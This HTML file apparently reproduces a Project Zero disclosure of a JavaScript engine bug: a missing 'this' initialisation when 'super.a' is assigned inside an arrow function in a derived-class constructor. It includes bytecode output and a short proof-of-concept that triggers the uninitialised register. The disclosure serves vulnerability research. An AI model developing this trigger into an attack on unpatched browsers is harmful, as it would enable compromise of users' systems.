45 lines
No EOL
1 KiB
HTML
45 lines
No EOL
1 KiB
HTML
<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1283
|
|
|
|
"EmitAssignment" doesn't call "EmitSuperMethodBegin" that initializes the "this" register for the case when the super keyword is used.
|
|
|
|
Here's the generated bytecode for the lambda function in the PoC. R5 is uninitialized.
|
|
Function Anonymous function ( (#1.3), #4) (In0) (size: 7 [7])
|
|
9 locals (1 temps from R8), 1 inline cache
|
|
Constant Table:
|
|
======== =====
|
|
R1 LdRoot
|
|
R2 Ld_A (undefined)
|
|
R3 LdC_A_I4 int:1
|
|
|
|
0000 ProfiledLdEnvSlot R6 = [1][4] <0>
|
|
000c ProfiledLdEnvSlot R4 = [1][3] <1>
|
|
|
|
|
|
Line 28: super.a = 1;
|
|
Col 13: ^
|
|
0018 LdHomeObjProto R8 R4
|
|
001d ProfiledStSuperFld R8.(this=R5) = R3 #0 <0>
|
|
0025 LdUndef R0
|
|
|
|
|
|
Line 29: }
|
|
Col 9: ^
|
|
0027 Ret
|
|
|
|
PoC:
|
|
-->
|
|
|
|
class Parent {
|
|
|
|
};
|
|
|
|
class Child extends Parent {
|
|
constructor() {
|
|
(() => {
|
|
super.a = 10; // Implicitly use the "this" register. So it must be initialized.
|
|
})();
|
|
}
|
|
};
|
|
|
|
new Child(); |